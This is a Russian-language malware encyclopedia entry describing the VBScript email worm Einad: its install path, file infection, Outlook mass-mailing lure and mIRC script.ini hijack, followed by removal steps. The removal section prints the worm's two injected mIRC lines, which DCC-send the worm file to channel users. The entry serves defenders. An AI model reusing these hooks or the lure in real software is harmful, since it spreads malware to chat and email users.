Email-Worm.VBS.Einad
Материал из Total Malware Info
Email-Worm.VBS.Einad Вирус-червь, распространяющийся через Интернет в виде вложений в зараженные электронные письма. Рассылается по всем найденным на зараженном компьютере адресам электронной почты. Имеет размер 2 430 байт. Написан на Visual Basic Script.
Инсталляция
При запуске червь копирует свое тело в корневой каталог диска С: под именем TripX.jpg.vbs:
C:\TripX.jpg.vbs
Деструктивная активность
Червь производит поиск файлов с расширением *.VBS в каталогах:
С:\ C:\Windows %Work% <на каталог выше от %Work%>
Все найденные файлы заражает свои телом. После чего производит поиск файлов с расширениями *.HTM, *.HTML в тех же каталогах. Во все найденные файлы дописывает строку:
<!--HTML.VBS.MIRC.EINAD-->
И свое тело. Червь рассылает свое тело по базе адресов почтового клиента "MS Outlook". Письмо следующего содержания: Тема письма:
A free sample screen mate from www.screenmate4u.com
Тело письма:
Screen Mates
Во вложении:
C:\TripX.jpg.vbs
Далее червь ищет путь к файлу настроек IRC – клиента "Mirc" script.ini по стандартным каталогам установки, и изменяет его таким образом, что всем пользователям при подключении к каналу или при выходе с канала, где находится зараженный компьютер, отправляется тело червя C:\TripX.jpg.vbs.
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- Удалить оригинальный файл червя (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить файл:
- В файле настроек IRC-клиента "Mirc" script.ini удалить строки:
C:\TripX.jpg.vbs
n1=ON 1:JOIN:#: if ($nick != $me) { /dcc send $nick c:\TripX.jpg.vbs }
n2=ON 1:PART:#: if ($nick != $me) { /dcc send $nick c:\TripX.jpg.vbs }
